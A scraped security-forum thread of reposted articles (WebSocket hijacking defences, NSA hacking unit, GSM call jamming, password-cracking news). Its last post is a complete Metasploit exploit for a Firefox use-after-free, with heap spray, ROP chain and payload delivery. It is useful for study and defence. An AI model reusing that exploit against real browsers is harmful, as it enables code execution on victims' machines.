victim. Therefore I call this attack vector Cross-Site WebSocket Hijacking (CSWSH). Effectively this allows the attacker in our scenario to read the victim's stock portfolio updates pushed via the WebSocket connection and update the protfolio by issuing write requests via the WebSocket connection. This is possible due to the fact that the server's WebSocket code relies on the session authentication data (cookies or HTTP-Authentication) sent along from the browser during the WebSocket handshake/upgrade phase. Another interesting observation is the Origin header that is sent along the WebSocket handshake/upgrade request. This is like in a regular CORS request utilizing Cross-Origin Resource Sharing: If this was a regular HTTP(S) CORS request, the browser would not let the JavaScript on the malicious webpage see the response, when the server does not explicitly allow it (via a matching Access-Control-Allow-Origin response header). But when it comes to WebSockets this "fail close" style of defaulting to "restrict response access" when the server does not explicitly allow cross-origin requests is inverted: In our example the server did not send any CORS response headers along, but the cross-site WebSocket request's response is still handled by the browser by properly establishing the full-duplex WebSocket connection. This demonstrates that WebSockets are not protected by the same-origin policy, so developers must not rely on this protection when it comes to developing WebSocket based applications. Clearly the CORS stuff has nothing to do with the WebSockets stuff, but they both utilize the same request header (Origin). Securing it As you've already noticed, securing an application against Cross-Site WebSocket Hijacking (CSWSH) attacks can be performed using two countermeasures: Check the Origin header of the WebSocket handshake request on the server! Use session-individual random tokens (like CSRF-Tokens) on the handshake request and verify them on the server. These simple but effective protections must be used as soon as you're using WebSockets inside an application which access the web session on the server-side to communicate and/or accept private data via the WebSocket channel. If you don't need to access the web session from the server-side WebSocket counterpart, just separately handle authorization and/or authentication using custom tokens or similar techniques within your WebSocket protocol and avoid relating it to the web session via cookies or HTTP-Authentication of the handshake request. Conclusion As a pentesterCheck for Cross-Site WebSocket Hijacking (CSWSH) attacks as soon as you notice any WebSocket based communication in the application you're analysing.As a security consultantMake your clients aware of the requirement to check Origin headers and educate them to secure all WebSocket handshakes using random tokens, like protecting against CSRF attacks.As a developerMake sure you are aware of this attack scenario and know how to employ the countermeasures securely into your application (at least when you need to access the web session from the application part that uses WebSockets or when you otherwise try to transfer non-public data over that channel). Better try to avoid accessing the web session from the server-side WebSocket counterpart and separately handle authorization and/or authentication using tokens or similar techniques within your protocol. by Christian Schneider on August 31st, 2013 Sursa: Cross-Site WebSocket Hijacking (CSWSH)
  13. The NSA has its own team of elite hackers By Andrea Peterson, Published: August 29 at 4:51 pm NSA headquarters at Fort Meade, MD where TAO’s main team reportedly works (Wikipedia) Our Post colleagues have had a busy day. First, they released documents revealing the U.S. intelligence budget from National Security Agency (NSA) leaker Edward Snowden. Then they recounted exactly how the hunt for Osama bin Laden went down. In that second report, Craig Whitlock and Barton Gellman shared a few tidbits about the role of the government’s hacking unit, Tailored Access Operations (TAO) in the hunt, writing that TAO “enabled the NSA to collect intelligence from mobile phones that were used by al-Qaeda operatives and other ‘persons of interest’ in the bin Laden hunt.” So just what is Tailored Access Operations? According to a profile by Matthew M. Aid for Foreign Policy, it’s a highly secret but incredibly important NSA program that collects intelligence about foreign targets by hacking into their computers, stealing data, and monitoring communications. Aid claims TAO is also responsible for developing programs that could destroy or damage foreign computers and networks via cyberattacks if commanded to do so by the president. So, TAO might have had something to do with the development of Stuxnet and Flame, malware programs thought to have been jointly developed by the U.S. and Israel. The malware initially targeted the Iranian nuclear program, but quickly made its way into the digital wild. According to Aid, TAO’s primary base is in the NSA headquarters in Fort Meade. There, he says, some 600 members of the unit work rotating shifts 24-7 in an “ultramodern” space at the center of the base called the Remote Operations Center (ROC). The unit bears a striking resemblance to a Chinese hacking group described in a report released by cybesecurity company Mandiant earlier this year. The report indicated that that group, APT1, was likely organized by the Chinese military. Perhaps not so coincidentally, Aid says multiple confidential sources have told him that TAO has “successfully penetrated Chinese computer and telecommunications systems for almost 15 years,” in the process, “generating some of the best and most reliable intelligence information about what is going on inside the People’s Republic of China.” But for all the reported secrecy surrounding TAO’s activities, a quick search of networking site LinkedIn shows a number of current and former intelligence community employees talking pretty openly about the exploits. For instance, Brendan Conlon, whose page lists him as a former Deputy Chief of Integrated Cyber Operations for the NSA and former Chief of TAO in Hawaii, says that he led “a large group of joint service NSA civilians and contractors in executing Computer Network Exploitation (CNE) operations against target networks.” Barbara Hunt, who is listed as a former Director of Capabilities at TAO in Fort Meade, similarly claims she was “responsible for end-to-end development and capability delivery to build a versatile computer network exploitation effort.” Dean Schyvincht, who claims to currently be a TAO Senior Computer Network Operator in Texas, might reveal the most about the scope of TAO activities. He says the 14 personnel under his management have completed “over 54,000 Global Network Exploitation (GNE) operations in support of national intelligence agency requirements.” Just imagine how productive the team in Fort Meade, rumored to have about 600 people, must be. Sursa: The NSA has its own team of elite hackers
  14. Anatomy of a dropped call - how to jam a city with 11 customised mobile phones by Paul Ducklin on August 29, 2013 When you think of "signal jamming," you probably imagine some kind of fine steel mesh that blocks out radio transmissions altogether, or a source of electromagnetic noise that interferes enough to make legitimate communication impossible. But a paper presented by a trio of German researchers at the recent USENIX Security Symposium reveals a much more subtle approach to jamming mobile phone calls. They were able to convert a single mobile phone into a denial of service (DoS) device that could be turned against another subscriber, perhaps wherever they roamed through a whole town or city. The paper is quite technical, and unavoidably filled with the jargon of mobile telephony, yet the authors have done an excellent job of making it into a comprehensible read that teaches you a number of useful security lessons. As they point out very clearly, many of the security decisions taken in the early days of the GSM (Global System for Mobile) system were based at least in part on security through obscurity. The consensus back then seemed to be, "Nobody will ever be able to build their own base station, or make their own handset!" So why bother going to the trouble of designing in security to protect against the hardware and firmware of the network itself turning hostile? All that has changed, with open source implementations available for both base stations and handsets. As a result, security shortcuts that didn't seem to matter much 20 years ago have come back to haunt us. How your phone receives a call Mobile phones aren't in a perpetual state of readiness to receive calls or SMSes (text messages) instantaneously. Instead, your phone spends most of its time in a low-power mode, from which it can be signalled to wake up fully to accept a call or message. (That's why your phone battery may well last for days when you aren't making or receiving calls, but typically only hours when you are.) Rather casually simplified, and with apologies to the authors of the USENIX paper, this is what happens when a nearby cell tower decides it's time for you to get a call: The base station sends out a broadcast page containing an identification code for your phone. Your phone recognises its own identification code. Your phone wakes up and responds to the base station. The base station and your phone negotiate a private radio channel for the call. Your phone authenticates to the base station. Your phone starts ringing (or an SMS arrives). How an attacker can "jam" your calls You can probably spot what computer scientists call a race condition in the sequence above, caused by the fact that authentication happens late in the game. Every device in range can listen in to the broadcast pages inviting your phone to wake up, so a device that's faster than yours can race you to step 5 and win, causing your phone's attempt to authenticate to be rejected. Of course, the "jamming" phone doesn't know how to authenticate, but that doesn't matter; in fact, it can deliberately fail the authentication, causing the process to bail out at step 5. There is no step 6, so the call is lost - invisibly to you, because you lost the race to reply - and service is denied. The authors got this attack working with a tweaked open source baseband (mobile phone firmware) that was adapted to ensure that it ran faster than a wide range of commercial handsets, including the Apple iPhone 4s, Samsung Galaxy S2 and Blackberry 9300 Curve. How an attacker finds your phone There is no authentication or encryption during the "are you there?" message and the "here I am!" reply, so an attacker doesn't need any cryptographic cleverness to work out which messages are meant for what devices. There is a slight complication, however: the attacker probably doesn't know your phone's identification code in advance. To be strictly correct: the code is tied to your SIM card, not to the phone hardware itself, since every SIM has a unique code called an IMSI (International Mobile Subscriber Identity) burned into it, rather like the MAC address in a network card. But GSM phones deliberately minimise the frequency with which unencrypted IMSIs are visible on the network, in order to provide you with some safety and privacy against being tracked too openly. Instead, occasional exchanges involving your true IMSI are used to produce a regularly changing TMSI, where T stands for Temporary. The TMSI is a pseudorandom, temporary identifier that varies as a matter of course as you turn your phone off and on or roam through a network. The network operator maintains a list to keep track of which TMSI relates to what IMSI at any moment, but that database is unlikely to be accessible to an attacker. The authors used traffic analysis to get round this problem. While sniffing all the TMSIs being broadcast on the network, they call your number 10 to 20 times in quick succession, but deliberately drop each call after a few seconds. The TMSI that suddenly appears 10 to 20 times in quick succession in the sniffer logs, as the network tries to track you down with its broadcast pages, is almost certainly the one they want. Easy, isn't it? ? As long as they drop the call after the TMSI has sent in a broadcast page but before your phone gets past the authentication stage (step 5 above), your phone won't ring and the imposter calls won't show up. That means you won't be aware that anything dodgy is going on. The authors used trial and error to determine a suitable call-drop delay for the network provider they targeted, finding that 3.7 seconds worked well. How the attacker finds out which cell you are in Here's the thing: he doesn't need to know more than your general location. When you receive a call, the mobile network doesn't page for your phone only in one cell of the network - it pages throughout your location area, which is a cluster of base stations in the vicinity. This means that the network doesn't need to keep precise tabs on you all the time, which in turn means that your phone doesn't have to tell the network exactly where it is from moment to moment, thus extending battery life. So as long as I know you are somewhere, say, in the City of Sydney, I can sit in a coffee shop at the Opera House and sniff for your TMSI wherever you go in town, because the broadcast pages that go out when I make those 10 to 20 bogus calls are duplicated everywhere in the location area. The authors did some warmapping drives around Berlin, their home turf, and determined that location areas can be very extensive, ranging from 100km2 to 500km2. (For comparison, the City of Sydney, which stretches from the Harbour Bridge south as far as Central Station, is just 25km2.) How the attacker can amplify the attack Instead of looking out for your TMSI and blocking your calls, what if the attacker wanted to block every call to knock a large metro area out in one go? One rigged sniffer phone alone couldn't do it. The authors found that although their tweaked phone baseband could beat many popular mobile phones in the race to authenticate, it still took about one second to "jam" each broadcast page, limiting each phone to about 60 "jammed" pages per minute. So they built a rig with eleven tweaked phones, thus allowing them to subvert more than 600 broadcast pages per minute. Their measurements suggested this would be enough to knock out the service of at least some of the four major German operators across one location area (100km2 - 500km2) in metro Berlin. Remember that the eleven attack phones don't have to be distributed through the location area, since all broadcast pages are replicated through all cells in the area. The only problem the authors faced was how to allocate the TMSI broadcasts amongst their eleven tweaked phones. Using a messaging system to hand out each successively sniffed TMSI to the next phone on the list required the use of a serial connection to each phone, which was too slow. In the end, they simply allowed each phone to select TMSIs by a bit pattern, so that phone 1, for example, might handle TMSIs starting with the bytes 0x00 to 0x1F, and so on. ? As an amusing side-effect of tuning the partitioning algorithm to ensure that each phone handled about the same quantity of broadcast pages, the authors noticed that the bytes in most TMSIs were far from randomly distributed. Ironically, in this case, the lack of randomness made the partitioning job harder, not easier. What about interception, not just jamming? As the authors note, in some mobile networks, they could go further than just cancelling your calls and knocking you off the network. They observed that some networks, presumably for performance reasons, cheat a little on step 5, and don't authenticate every call. In these cases, an attacker who can win the race to the authentication stage (step 5 above) can do more than cancel your call - he can accept it instead (or receive your SMS), from anywhere in your location area, and you won't realise. Also, some networks still use outdated, broken versions of the A5 encryption algorithm that is part of the GSM standard. On these networks, your calls can be sniffed and decrypted anyway, but in a busy metro area, an attacker is faced with problems of volume: how to home in automatically only on the calls he really wants to intercept, without having to listen to everyone else's chatter too. The authors' "jamming" firmware could be modified to do just that job, used as a call alerting mechanism instead of for a denial of service. ? Sniffing the call data for later decryption can't be done from anywhere in the location area, which is a small mercy, so an attacker needs to be in the same cell as you. What to do about it? You can probably guess what mitigations the authors proposed, because they are obvious and easy to say; you will also probably wonder if they will ever happen, because they involve change, and potentially disruptive change at that, so they are hard to do. Defending against the eavesdropping and call hijacking problems is straightforward: perform authentication for every call or SMS, and don't use broken versions of the GSM cipher. The system already supports everything that's needed; all that is required is for it to be turned on and used by every operator. Defending against the denial of service problem is slightly trickier, as it needs a protocol change: move authentication up the batting order to prevent the race condition. The authors propose a technically simply way to do this, but it means shifting some of the cryptographic operations from the authentication stage (step 5 above) to the "are you there?/here I am!" stages (steps 1 and 2). Unfortunately, these mitigations don't include steps you can take to help yourself; they need changes from the mobile operators. Will that happen? Or will backward compatibility, the thorn that is making Windows XP so hard to dislodge, get in the way yet again? Sursa: Anatomy of a dropped call – how to jam a city with 11 customised mobile phones | Naked Security
  15. Apple's new technology will allow government to control your iPhone remotely Author: Mohit Kumar, The Hacker News Recently, The Social Media is buzzing over reports that Apple has invented a new technology that now can Switch off iPhone Camera and Wi-Fi, when entering a 'sensitive area'. Technology would broadcast a signal to automatically shut down Smartphone features, or even the entire phone. Yes ! It's true, On June 2008 - Apple filed a patent (U.S. Patent No. 8,254,902) - titles “Apparatus and methods for enforcement of policies upon a wireless device” that defines the ability of U.S. Government to remotely disable certain functions of a device without user consent. All they need to do is decide that a public gathering or venue is deemed sensitive and needs to be protected from externalities. Is it not a shame that you can't take a photo of the police officer beating a man in the street because your oppressive government remotely disabled your Smartphone camera? Civil liberties campaigners fear it could be misused by the authorities to silence 'awkward citizens'. Apple insists that the affected locations are normally cinemas, theaters and concert grounds, but Apple admits it could also be used in covert police or government operations that may need complete blackout conditions. "This technology would be a dangerous power to place in the hands of the government," Kurt Opsahl, a civil liberties lawyer at Electronic Frontier Foundation (EFF). "The government shutting down iPhone cameras and connectivity in order to prevent photos of political activity or the organization of the event would constitute a prior restraint on the free speech rights of every person affected, whether they're an activist or an observer" he added. Apple also says that the user can be given a choice to approve changes being sent remotely, however one cannot rule out the possibility of some changes being applied to the device without user consent. Sursa: Apple's new technology will allow government to control your iPhone remotely - The Hacker News
  16. Da, s-ar mai putea configura: 1. Intervalul la care sa verifice daca sunt posturi noi 2. Timeout-ul pentru acel popup Buna treaba.
  17. Da, pacat ca e scris in Ruby.
  18. Metasploit - The Exploit Learning Tree Author Mohan Santokhi This is a whitepaper called Metasploit - The Exploit Learning Tree. Instead of being just another document discussing how to use Metasploit, the purpose of this document is to show you how to look deeper into the code and try to decipher how the various classes and modules hang together to produce the various functions. # Reference 1 /documentation/developers_guide.pdf 2 http://dev.metasploit.com/documents/meterpreter.pdf 3 external/source/meterpreter/source/extensions/stdapi/server/railgun/railgun_manual.pdf 4 www.nologin.org/Downloads/Papers/remote-library-injection.pdf 5 www.nologin.org/Downloads/Papers/win32-shellcode.pdf 6 Metasploit Unleashed 7 http://www.securitytube.net/groups?operation=view&groupId=10 2 Table of Contents 1 Document Control.................................................................................................................................. 2 1.1 Document Block ............................................................................................................................ 2 1.2 Change History ............................................................................................................................. 2 1.3 References .................................................................................................................................... 2 2 Table of Contents .................................................................................................................................. 3 3 Introduction............................................................................................................................................ 4 4 Setup ..................................................................................................................................................... 5 4.1 Getting started .................................................................................................................................... 5 4.2 Install Missing Gems ........................................................................................................................... 7 4.3 Test the environment .......................................................................................................................... 8 5 Exploit Metamodel ................................................................................................................................. 9 6 Vulnerable Service .............................................................................................................................. 11 7 msfconsole Initialisation Phase ............................................................................................................ 14 8 Use command ..................................................................................................................................... 16 9 Set command ...................................................................................................................................... 18 10 Exploit command ................................................................................................................................. 19 10.1 Create Payload Objects .................................................................................................................. 21 10.2 Generate Encoded Payload ............................................................................................................ 24 10.3 Start handler ................................................................................................................................... 24 10.4 Exploit The Target ........................................................................................................................... 25 10.5 Establish Session ............................................................................................................................ 26 10.6 Interact With Target ......................................................................................................................... 26 11 Meterpreter .......................................................................................................................................... 27 11.1 Meterpreter payloads ...................................................................................................................... 28 11.2 Client components .......................................................................................................................... 30 11.2.1 UI components ............................................................................................................................. 30 11.2.2 Command proxy components ....................................................................................................... 33 11.3 Meterpreter Protocol ....................................................................................................................... 35 11.3.1 Client side protocol API ................................................................................................................ 35 11.3.2 Server side protocol API ............................................................................................................... 37 11.4 Server components ......................................................................................................................... 38 11.5 Server extensions ........................................................................................................................... 41 12 Writing Meterpreter Extensions ............................................................................................................ 43 12.1 Design commands, requests and responses ................................................................................... 43 12.2 Implement skeleton extension ......................................................................................................... 45 12.3 Implement command dispatcher class ............................................................................................ 47 12.4 Implement command proxy class .................................................................................................... 47 13 Railgun ................................................................................................................................................ 48 13.1 Meterpreter scripts .......................................................................................................................... 52 Download: http://packetstorm.igor.onlinedirect.bg/papers/attack/metasploit-the-learning-tree.pdf Sursa: Metasploit - The Exploit Learning Tree ? Packet Storm
  19. [h=1]The Future is Here: C++ 11[/h] Publicat la 28.08.2013 Special Guest Lecture by C++ Inventor Bjarne Stroustrup
  20. Conturile mai vechi, ca al meu, aveau deja 25 GB.
  21. [h=1]Visual Studio 2013 IDE[/h] Posted: 16 hours ago By: Robert Green MP3 (Audio only) [h=3]File size[/h] 29.4 MB MP4 (iPod, Zune HD) [h=3]File size[/h] 177.5 MB Mid Quality WMV (Lo-band, Mobile) [h=3]File size[/h] 103.0 MB High Quality MP4 (iPad, PC) [h=3]File size[/h] 387.4 MB Mid Quality MP4 (Windows Phone, HTML5) [h=3]File size[/h] 271.3 MB High Quality WMV (PC, Xbox, MCE) In this episode, Robert is joined by Cathy Sullivan, who shows us some of the many enhancements to the Visual Studio 2013 development environment, including: Signing into the IDE to synchronize your settings [00:40] Notifications center [06:00] Improvements to overall look and feel [11:30] Auto brace completion [16:00] Enhanced scroll bar [18:45] Improved Navigate To experience [20:00] Peek Definition [22:00] CodeLenses [24:50] Video: Visual Studio 2013 IDE | Visual Studio Toolbox | Channel 9
  22. [h=1]From the Archives: Erik Meijer and Mark Shields - Compiling MSIL to JS[/h] Posted: 1 day ago By: Charles High Quality WMV (PC, Xbox, MCE) MP3 (Audio only) MP4 (iPod, Zune HD) Mid Quality WMV (Lo-band, Mobile) This interview never shipped on C9, but why keep it hidden when we don't have to? From the archives, Erik Meijer and Mark Shields join us for a chat about compiling MSIL to JS. Erik!!! Tune in. Enjoy. Video: From the Archives: Erik Meijer and Mark Shields - Compiling MSIL to JS | Charles | Channel 9
  23. [h=1]Hashcat Can Now Be Used to Crack 55-Character Passwords[/h] August 28th, 2013, 11:38 GMT · By Eduard Kovacs The developers of oclHashcat have released a new version of the popular password cracking tool. The latest release is capable of cracking passwords that are made of up to 55 characters. A lot of sensitive data is leaked these days by hackers. While in most cases the leaked passwords are encrypted, it’s becoming easier for cybercriminals to crack the hashes. The latest version of oclHashcat supports several new algorithms and GPUs. Various other changes have been implemented, but the most important is the fact that the tool can now be utilized to crack passwords that are longer than 15 characters. The developers admit that performance is negatively impacted by adding support for longer passwords. However, they claim this was “by far one of the most requested features.” “We can crack passwords up to length 55, but in case we're doing a combinator attack, the words from both dictionaries can not be longer than 31 characters. But if the word from the left dictionary has the length 24 and the word from the right dictionary is 28, it will be cracked, because together they have length 52,” Jens Steube, the lead Hashcat developer, wrote in the release notes. Sursa: Hashcat Can Now Be Used to Crack 55-Character Passwords
  24. Evading Internet Censorship This research project by Brandon Wiley -- the tool is called "Dust" -- looks really interesting. Here's the description of his Defcon talk: Abstract: The greatest danger to free speech on the Internet today is filtering of traffic using protocol fingerprinting. Protocols such as SSL, Tor, BitTorrent, and VPNs are being summarily blocked, regardless of their legal and ethical uses. Fortunately, it is possible to bypass this filtering by reencoding traffic into a form which cannot be correctly fingerprinted by the filtering hardware. I will be presenting a tool called Dust which provides an engine for reencoding traffic into a variety of forms. By developing a good model of how filtering hardware differentiates traffic into different protocols, a profile can be created which allows Dust to reencode arbitrary traffic to bypass the filters. Dust is different than other approaches because it is not simply another obfuscated protocol. It is an engine which can encode traffic according to the given specifications. As the filters change their algorithms for protocol detection, rather than developing a new protocol, Dust can just be reconfigured to use different parameters. In fact, Dust can be automatically reconfigured using examples of what traffic is blocked and what traffic gets through. Using machine learning a new profile is created which will reencode traffic so that it resembles that which gets through and not that which is blocked. Dust has been created with the goal of defeating real filtering hardware currently deployed for the purpose of censoring free speech on the Internet. In this talk I will discuss how the real filtering hardware work and how to effectively defeat it. Download: http://blanu.net/Dust.pdf Sursa: https://www.schneier.com/blog/archives/2013/08/evading_interne.html
  25. Firefox XMLSerializer Use After Free Authored by regenrecht, juan vazquez | Site metasploit.com This Metasploit module exploits a vulnerability found on Firefox 17.0 (< 17.0.2), specifically an use after free of an Element object, when using the serializeToStream method with a specially crafted OutputStream defining its own write function. This Metasploit module has been tested successfully with Firefox 17.0.1 ESR, 17.0.1 and 17.0 on Windows XP SP3. ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::RopDb def initialize(info = {}) super(update_info(info, 'Name' => 'Firefox XMLSerializer Use After Free', 'Description' => %q{ This module exploits a vulnerability found on Firefox 17.0 (< 17.0.2), specifically an use after free of an Element object, when using the serializeToStream method with a specially crafted OutputStream defining its own write function. This module has been tested successfully with Firefox 17.0.1 ESR, 17.0.1 and 17.0 on Windows XP SP3. }, 'License' => MSF_LICENSE, 'Author' => [ 'regenrecht', # Vulnerability Discovery, Analysis and PoC 'juan vazquez' # Metasploit module ], 'References' => [ [ 'CVE', '2013-0753' ], [ 'OSVDB', '89021'], [ 'BID', '57209'], [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-006/' ], [ 'URL', 'http://www.mozilla.org/security/announce/2013/mfsa2013-16.html' ], [ 'URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=814001' ] ], 'DefaultOptions' => { 'EXITFUNC' => 'process', 'PrependMigrate' => true }, 'Payload' => { 'BadChars' => "\x00", 'DisableNops' => true, 'Space' => 30000 # Indeed a sprayed chunk, just a high value where any payload fits }, 'Platform' => 'win', 'Targets' => [ [ 'Firefox 17 / Windows XP SP3', { 'FakeObject' => 0x0c101008, # Pointer to the Sprayed Memory 'FakeVFTable' => 0x0c10100c, # Pointer to the Sprayed Memory 'RetGadget' => 0x77c3ee16, # ret from msvcrt 'PopRetGadget' => 0x77c50d13, # pop # ret from msvcrt 'StackPivot' => 0x77c15ed5, # xcht eax,esp # ret msvcrt } ] ], 'DisclosureDate' => 'Jan 08 2013', 'DefaultTarget' => 0)) end def stack_pivot pivot = "\x64\xa1\x18\x00\x00\x00" # mov eax, fs:[0x18 # get teb pivot << "\x83\xC0\x08" # add eax, byte 8 # get pointer to stacklimit pivot << "\x8b\x20" # mov esp, [eax] # put esp at stacklimit pivot << "\x81\xC4\x30\xF8\xFF\xFF" # add esp, -2000 # plus a little offset return pivot end def junk(n=4) return rand_text_alpha(n).unpack("V").first end def on_request_uri(cli, request) agent = request.headers['User-Agent'] vprint_status("Agent: #{agent}") if agent !~ /Windows NT 5\.1/ print_error("Windows XP not found, sending 404: #{agent}") send_not_found(cli) return end unless agent =~ /Firefox\/17/ print_error("Browser not supported, sending 404: #{agent}") send_not_found(cli) return end # Fake object landed on 0x0c101008 if heap spray is working as expected code = [ target['FakeVFTable'], target['RetGadget'], target['RetGadget'], target['RetGadget'], target['RetGadget'], target['PopRetGadget'], 0x88888888, # In order to reach the call to the virtual function, according to the regenrecht's analysis ].pack("V*") code << [target['RetGadget']].pack("V") * 183 # Because you get control with "call dword ptr [eax+2F8h]", where eax => 0x0c10100c (fake vftable pointer) code << [target['PopRetGadget']].pack("V") # pop # ret code << [target['StackPivot']].pack("V") # stackpivot # xchg eax # esp # ret code << generate_rop_payload('msvcrt', stack_pivot + payload.encoded, {'target'=>'xp'}) js_code = Rex::Text.to_unescape(code, Rex::Arch.endian(target.arch)) js_random = Rex::Text.to_unescape(rand_text_alpha(4), Rex::Arch.endian(target.arch)) js_ptr = Rex::Text.to_unescape([target['FakeObject']].pack("V"), Rex::Arch.endian(target.arch)) content = <<-HTML <html> <script> var heap_chunks; function heapSpray(shellcode, fillsled) { var chunk_size, headersize, fillsled_len, code; var i, codewithnum; chunk_size = 0x40000; headersize = 0x10; fillsled_len = chunk_size - (headersize + shellcode.length); while (fillsled.length <fillsled_len) fillsled += fillsled; fillsled = fillsled.substring(0, fillsled_len); code = shellcode + fillsled; heap_chunks = new Array(); for (i = 0; i<1000; i++) { codewithnum = "HERE" + code; heap_chunks[i] = codewithnum.substring(0, codewithnum.length); } } function gen(len, pad) { pad = unescape(pad); while (pad.length < len/2) pad += pad; return pad.substring(0, len/2-1); } function run() { var container = []; var myshellcode = unescape("#{js_code}"); var myfillsled = unescape("#{js_random}"); heapSpray(myshellcode,myfillsled); var fake = "%u0000%u0000" + "%u0000%u0000" + "%u0000%u0000" + "%u0000%u0000" + "%u0000%u0000" + "%u0000%u0000" + "%u0000%u0000" + "#{js_ptr}"; var small = gen(72, fake); var text = 'x'; while (text.length <= 1024) text += text; var parent = document.createElement("parent"); var child = document.createElement("child"); parent.appendChild(child); child.setAttribute("foo", text); var s = new XMLSerializer(); var stream = { write: function() { parent.removeChild(child); child = null; for (i = 0; i < 2097152; ++i) container.push(small.toLowerCase()); } }; s.serializeToStream(parent, stream, "UTF-8"); } </script> <body onload="run();"> </body> </html> HTML print_status("URI #{request.uri} requested...") print_status("Sending HTML") send_response(cli, content, {'Content-Type'=>'text/html'}) end end Sursa: Firefox XMLSerializer Use After Free ? Packet Storm
×
×
  • Create New...